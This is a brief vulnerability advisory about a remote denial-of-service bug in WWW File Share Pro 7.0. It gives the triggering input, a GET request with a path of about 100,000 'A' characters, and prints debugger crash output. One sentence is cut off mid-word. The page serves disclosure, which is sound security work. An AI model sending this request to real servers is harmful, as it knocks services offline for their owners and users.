WWW File Share Pro v7.0 - Remote Denial of Service (Advisory & Video)

WWW File Share Pro v7.0 - Remote Denial of Service (Advisory & Video)

The core team researcher Ateeq ur Rehman Khan discovered a short video explaining an issue in the www file share pro v7.0. The video shows h

A critical stack exhaustion buffer overflow vulnerability resulting in remote denial of service has been detected in the latest WWW File Share PRO 7.0 software. The vulnerability can be triggered by sending a large malformed HTTP GET request to the vulnerable server. e.g. GET /upload2.htm/A * 100000 resulting in an immediate crash of the application.

(199c.189c): Unknown exception - code c000008f (first chance)
(199c.189c): Unknown exception - code c000008f (first chance)
(199c.189c): Stack overflow - code c00000fd (first chance)

First chance exceptions are reported before any exception handling. This exception may be expected and handled.

eax=0009334c ebx=006b7528 ecx=00000002 edx=00000000 esi=006b7528 edi=006b7528
eip=7549c42d esp=0009334c ebp=0009339c iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
KERNELBASE!RaiseException+0x58:

Stack Exhaustion starting at KERNELBASE!RaiseException+0x0000000000000058 (Hash=0x217757a7.0x7b922161)

WWW File Share Pro v7.0 - Stack Exhaustion Remote PoC DoS Exploit

Advisory: http://www.vulnerability-lab.com/get_content.php?id=1310

Video: http://www.vulnerability-lab.com/get_content.php?id=1309